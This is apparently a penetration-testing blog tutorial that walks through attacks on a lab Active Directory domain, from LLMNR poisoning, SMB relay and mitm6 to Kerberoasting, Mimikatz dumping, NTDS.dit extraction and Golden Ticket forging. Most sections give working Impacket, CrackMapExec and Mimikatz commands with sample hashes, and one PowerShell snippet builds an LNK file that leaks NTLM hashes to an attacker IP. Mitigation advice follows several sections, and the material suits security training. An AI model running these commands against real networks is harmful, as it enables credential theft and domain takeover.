Active Directory Attacks

In this blog I will go through various techniques and strategies for attacking Active Directory environment. Topics like LLMNR poisoning, SMB relay attacks, IPv6 attacks, post-compromise enumeration, and advanced post-compromise techniques like Kerberoasting, token impersonation, Golden Ticket attacks and much more will be covered. Each section covers attack methods, practical demonstrations, and mitigation strategies.

LLMNR Poisoning:

LLMNR (Link-Local Multicast Name Resolution) poisoning happens when a device on a network can’t find the correct IP address through DNS (Domain Name System). When DNS fails, the device sends a broadcast message to all devices on the network, asking for the address it needs. A hacker can respond to this broadcast pretending to be the correct server, tricking the victim into sending sensitive information, like passwords, to the attacker instead. This way, the attacker intercepts and steals data by exploiting the failed DNS lookup.

To exploit this defect we can use a tool called Responder in Kali

sudo responder -I eth0 -dPv

The best time to run this tool is early in the morning or after lunch, when users are trying heavily to log into their devices and shares.

The captured hash will look like this

Cracing NTLM hash with hashcat:

We can save the hash that we obtained in a file then pass the hash to hashcat and use the module 5600 which is the module that we need to crack NetNTLMv2 hashes

hashcat -m 5600 hashes.txt /usr/share/wordlists/rockyou.txt 

SMB Relay Attack:

An SMB Relay attack involves capturing authentication hashes using a tool like Responder and then relaying those hashes to another machine on the network to gain unauthorized access. Instead of cracking the hashes, the attacker uses them directly to authenticate with a target system. For this attack to succeed, SMB signing must either be disabled or not enforced on the target system, and the relayed credentials need to have administrative privileges on the target machine

Checking if the target doesn’t have SMB signing

nmap --script=smb2-security-mode.nse -p445 <Target IP>

Ideally what we are looking for is the message

“Message signing enabled but not required”

Then we need to switch off the http and the smb in the responder.conf file located at /etc/responder/Responder.conf

Because we want to relay the hashes and not just capture them

Now we are going to start the responder as shown previously and in a sub-terminal tab we will be running a tool called ntlmrelayx and pass the target file that contains the IPs of our targets to it

impacket-ntlmrelayx -tf targets -smb2support 

We managed to dump the local admin hash. We dumped the SAM

We can get more creative with this attack. We can re-run the command with -i flag at the end to get an interactive shell on the target machine that will allow us to do some stuff on the shares.

impacket-ntlmrelayx -tf targets -smb2support -i

We have got a client shell on 127.0.0.1:11000

We can bind to it now using NetCat

We can even execute command using smb relay attack by adding -c at the end of our command

impacket-ntlmrelayx -tf targets -smb2support -c "whoami"

We can get more malicious and type a command to add a new admin user to the system 😈

Gaining shell via the dumped information:

Using the SAM information that we dumped we can get a shell access to the machine using Metasploit or

We need the module exploit/windows/smb/psexec

The payload the we will be using is windows/x64/meterpreter/reverse_tcp

Now we need RHOSTS, SMBDomain, SMBPass, SMBUser if we cracked the user password, otherwise we can use the administrator hash and we don’t need the SMBDomain

Doing it manually using psexec:

We can use psexec to get a shell

impacket-psexec administrator@<target IP> -hashes <hash>

SMB Relay Attack Mitigation Strategies:

• Enable SMB Signing on all devices: This completely prevents the attack but might slow down file transfers
• Disable NTLM Authentication on the network: Eliminates the attack risk entirely, but if Kerberos fails, Windows may fall back to NTLM.
• Implement Account Tiering: Limits domain admin logins to specific tasks, reducing exposure, though enforcing this can be challenging.
• Restrict Local Admin Access: Helps prevent lateral movement, though it might lead to more help-desk tickets due to access restrictions.

IPv6 attack DNS take over via MITM6:

When IPv6 is enabled on a Windows device without proper configuration, both IPv4 and IPv6 can be active. By default, Windows devices prioritize IPv6 over IPv4. However, if no DNS servers are configured for IPv6. In such cases, an attacker could potentially act as a “fake” DNS server for IPv6 traffic, spoofing the network and intercepting the traffic. This allows the attacker to redirect IPv6 traffic through their system. As a result, the IPv6 traffic from the victim machine can be routed through the attacker and forwarded to the domain controller (DC). Once this is established, the attacker could exploit the connection to gain authentication access to the domain controller via protocols like LDAP or SMB

impacket-ntlmrelayx -6 -t ldaps://domain_Controller_IP -wh fakewpad.marvel.local -l looted

Then we run on another tab

sudo mitm6 -d marvel.local

Now when an event gets triggered(machine gets rebooted), we can see that the domain info got dumped in to the looted directory.

We can see as well a new domain user got created, when a user logged in on a machine as a domain admin.

IPv6 attack DNS take over mitigation

1. IPv6 Queries: Windows may query for IPv6 addresses even in IPv4-only networks. To prevent man-in-the-middle (MitM) attacks, block DHCPv6 traffic and router advertisements in Windows Firewall using Group Policy, but avoid disabling IPv6 entirely, as it can cause issues.

2. Predefined Rules to Block: Set the following inbound and outbound rules to “Block”:

• DHCPv6-In (Inbound)
• Router Advertisement (ICMPv6-In) (Inbound)
• DHCPv6-Out (Outbound)

3. WPAD (Web Proxy Auto-Discovery): Disable WPAD through Group Policy and by turning off the WinHttpAutoProxySvc service if it’s not used internally.

4. LDAP and LDAPS Relaying: Enable LDAP signing and LDAP channel binding to mitigate risks.

5. Administrative Users: Add sensitive administrative users to the Protected Users group or mark their accounts as “Account is sensitive and cannot be delegated” to prevent impersonation.

Attacking Active Directory: Post-Compromise Enumeration

What happens once we compromise an account?

Once an account is compromised in a domain, even a regular user account can provide a wealth of information. This access allows attackers to enumerate critical details about the Active Directory environment, and setting the stage for further exploitation and lateral movement within the network.

Domain enumeration with ldapdomaindump

ldapdomaindump is a Python-based tool that delves into Active Directory domains, extracting and presenting data in user-friendly HTML reports and structured formats like JSON and CSV. It’s particularly valuable for security assessments, offering insights into users, groups, computers, and policies within a domain.

Lets start by creating a directory for the information to be dumped into

sudo ldapdomaindump ldaps://AD-IP -u 'domain\user' -p password

sudo ldapdomaindump ldaps://192.168.29.132 -u 'MARVEL\fcastle' -p Password1

Domain enumeration with BloodHound

BloodHound is a tool that helps pentesters to identify and visualize risky relationships in Active Directory. It uncovers attack paths that attackers could use to gain control over a network.

First we need to run neo4j then bloodhound on a separate terminal

Now we need to use ingester to dump information about the AD to be consumed by BloodHound

sudo bloodhound-python -d <domain name> -u <user name> -p <user password> -ns <Name Server will be the DC> -c all

sudo bloodhound-python -d MARVEL.local -u fcastle -p Password1 -ns 192.168.29.132 -c all

Now we need to feed these data to BloodHound

When the upload is done we can click Clear Finished

Looking at the Database info we can see that we pulled some info

Navigating to the Analysis tab will show all the graphical information

Attacking Active Directory: Post-Compromise Attacks

Dumping with secretsdump and Cracking them:

secretsdump is a Python script from the Impacket toolkit that allows attackers to extract sensitive information from Windows systems, such as password hashes, NTLM credentials, and Kerberos tickets. It can dump these secrets over SMB, from LSASS memory, or from a live Windows system or its Active Directory database. It is often used for offline or remote attacks.

NOTE: we can run this tool with a password or with a hash

When we compromise an account we need to dump the secrets/creds of that account in order to use these secrets in lateral movement.

Dumping secrets with password

impacket-secretsdump <Domain name>/<user name>:'<user password>'@<machine IP>

impacket-secretsdump MARVEL.local/fcastle:'Password1'@192.168.29.133

Dumping secrets with hash

impacket-secretsdump <user name>:@<machine ip> -hashes <hash>

impacket-secretsdump administrator:@192.168.29.133 -hashes ad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f

Pass the hash/Pass the password attack:

When an attacker obtains a password or hash, he can pass these credentials to authenticate to other systems in the network. This might allow them to gain access to additional resources this is called a lateral movement, or vertical movement if the attacker obtains access with higher privileges.

crackmapexec <protocol> <net cidr> -u <user name> -d <domain name> -p <user password>

crackmapexec smb 192.168.29.0/24 -u pparker -d MARVEL.local -p Password2

The (Pwn3d!) means that we have local administrator access to the machine using the provided creds in the attack.

The green [+] without (Pwn3d!) means we have a valid authentication but we are not a local admin on the machine

We can pass a hash

crackmapexec smb <net cidr> -u <user name> -H <hash> --local-auth

crackmapexec smb 192.168.29.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth

We can do a lot of things using crackmapexec like dumping the SAM directly from every single device we login to. by adding the - - sam flag

We can enumerate shares by adding the - -shares flag at the end

We can use crackmapexec with other protocols

Pass the hash/Pass the password mitigation:

To enhance security and make attacks more difficult:

Limit Account Reuse:

• Avoid reusing local admin passwords.
• Disable Guest and Administrator accounts.
• Restrict local administrator access (apply least privilege).

Use Strong Passwords:

• Opt for passwords longer than 14 characters.
• Avoid common words; consider using long sentences.

Implement Privileged Access Management (PAM):

• Use check-in/check-out processes for sensitive accounts.
• Automatically rotate passwords during these actions.
• This strengthens security by regularly updating hashes/passwords.

Kerberoasting:

First lets explain what is Kerberos and how does it work

Kerberos is a secure way for computers and users to prove their identity on a network.

1. The user enters their password, which is used to request a Ticket Granting Ticket (TGT) from the Key Distribution Center (KDC).
2. The KDC validates the password and sends back the TGT.
3. The TGT is used to request service-specific tickets from the KDC.
4. These tickets allow access to specific services without re-entering the password.
5. This process ensures secure authentication and avoids sending passwords over the network.

Kerberoasting is an attack where an attacker requests service tickets for accounts with Service Principal Names (SPNs) in Active Directory. These tickets are encrypted with the service account’s password hash. The attacker extracts the ticket, then cracks the hash offline to recover the account’s password. It exploits weak or poorly managed service account passwords.

We can use this attack whenever we compromise a domain user.

To initiate this attack we need to use a tool called GetUserSPNs

sudo impacket-GetUserSPNs <Domain name>/<domainuser>:<domain user password> -dc-ip <DC IP> -request

sudo impacket-GetUserSPNs MARVEL.local/fcastle:Password1 -dc-ip 192.168.29.132 -request

Now we can grab the hash, save it to a file, and crack it using HashCat using the module 13100

hashcat -m 13100 krb.txt /usr/share/wordlists/rockyou.txt

Kerberoasting Mitigation Strategies:

• Strong and complex passwords
• Least privilege: your service account should not be running as a domain admin
• Don’t save service account passwords in the description of the AD account.

Token impersonation:

Tokens are temporary keys that allow you access to a system/network without having to provide credentials each time you access a file.
Think cookies for computers.

Two types of tokens:

• Delegate — Created for logging into a machine or using Remote Desktop.
• Impersonate — “Non-interactive” such as attaching a network drive or a domain logon script.

Token impersonation is a post-exploitation technique that allows attackers to steal and impersonate a logged-on user’s access token without knowing their credentials. It enables lateral movement, privilege escalation, and potentially gaining domain admin privileges. The attacker needs local admin rights to steal tokens from the compromised machine.

We can achieve this attack using multiple tools, but here we are going to utilize Metasploit.

When we have a meterpreter shell on the machine we can load incognito

We can type help to see what we can do

We can use the list_tokens -u to list all the tokens. In the delegate section we can see the user pparker is logged in

Now we are running as nt authority\system

lets impersonate pparker using the command

impersonate_token marvel\\pparker

Note: we need to backslashes for character escaping

Token impersonation Mitigation Strategies:

• Limit user/group token creation permission:
  Restrict who can create tokens to prevent privilege abuse.
• Account tiering:
  Separate accounts by privilege levels to minimize lateral movement.
• Local admin restriction:
  Reduce local admin access to prevent unauthorized system control.

LNK file attack:

This is another way to obtain the NTLMv2 hashes through a watering hole, and it work by dumping a malicious file into a share that we have access to.

If we have responder running and someone trigger the file, we can capture a NTLMv2 hash

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\test.lnk")
$lnk.TargetPath = "\\<attacker IP>\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

Running these commands in an elevated PowerShell will generate a file called test.lnk in the C: drive then we need to rename the file and add @ or ~ at the beginning of the file name in order to make it appear at the top of the screen.

Credentials dumping with Mimikatz:

Mimikatz is a tool used to view and steal credentials, generate Kerberos tickets, and leverage attacks, dump credentials stored in memory

Some attacks we can do with Mimikatz: Credential Dumping, Pass-the-Hash, Over-Pass-the-Hash, Pass-the-Ticket, Silver Ticket, and Golden Ticket

Note: this tool will be picked by any sort of antivirus out there, and in order to actually utilize it you have to heavily obfuscate it .

We need to run this tool in the compromised machine with an elevated CMD.

We can type privilege:: to get all the modules that we can use

Now we need to set the privilege to debug because this gives us the privileges to run all the attacks that we want.

privilege::debug

Now we can use sekurlsa to view some of the attacks that we can do

sekurlsa::

sekurlsa::logonPasswords

To dump logon secrets

We can see usernames, domain name, NTLM hashes.

Sometimes we get a clear text passwords

Post-Domain Compromise Attacks

Dumping the NTDS.dit:

NTDS.dit is a database used to store AD data. This data includes:

• User information
• Group information
• Security descriptors
• Password hashes

For this attack we can use secretsdump against AD with a known domain admin(that we compromised or a user with domain admin priviliges that we added after compromising the domain), with the switch -just-dc-ntlm

impacket-secretsdump MARVEL.local/<domain admin user>:'<password>'@<dc IP> -just-dc-ntlm

Golden ticket attack:

A Golden Ticket attack in Active Directory (AD) occurs when an attacker gains the KRBTGT account’s hash, which is used to sign all Kerberos tickets. With this, the attacker can forge Kerberos Ticket Granting Tickets (TGTs), granting unrestricted access to any service or resource in the domain. These tickets can bypass detection and remain valid until the KRBTGT password is reset twice. This makes the attack highly persistent and dangerous.

For this attack to be successful we need the KRBTGT hash, and the domain SID.

Once we obtained these we can generate the Golden Ticket, and once we generate it we can use pass the ticket in order to utilize this anywhere. For example we can use pass the ticket and open command prompt from wherever we are and we can access any machine in the domain.

For this attack we are going to use lsadump in Mimikatz to get the information for KRBTGT account.

We start by adding privileg to debugg

Then we execute the following command to get the lsa for krbtgt

lsadump::lsa /inject /name:krbtgt

We need few things here

• SID of th domain
• Group information
• Security descriptors
• Password hashes

The SID in our case is S-1–5–21–3754946871–1514195659–2707793254

We need to NTLM hash of the KRBTGT account, in our case it is c015d0973c5e241e35a4e3f23e70f78e

Now we need

kerberos::golden /User:Administrator /domain:<domain name> /sid:<sid> /krbtgt:<krbtgt hash> /id:500 /ptt

kerberos::golden /User:Administrator /domain:marvel.local /sid:S-1–5–21–3754946871–1514195659–2707793254 /krbtgt:c015d0973c5e241e35a4e3f23e70f78e /id:500 /ptt

We got Golden ticket for ‘Administrator @ marvel.local’ successfully submitted for current session.

Now we can execute commands on any machine of the domain.

To do this we can use

misc::cmd

This will popup a new cmd window for us, we can use it to run commands on our targets machines. Lets try dir on THEPUNISHER machine

dir \\THEPUNISHER\c$

We can take this furthure and download psexec on the machine, and get shell access to the machines if we want to

psexec.exe \\<machine name> cmd.exe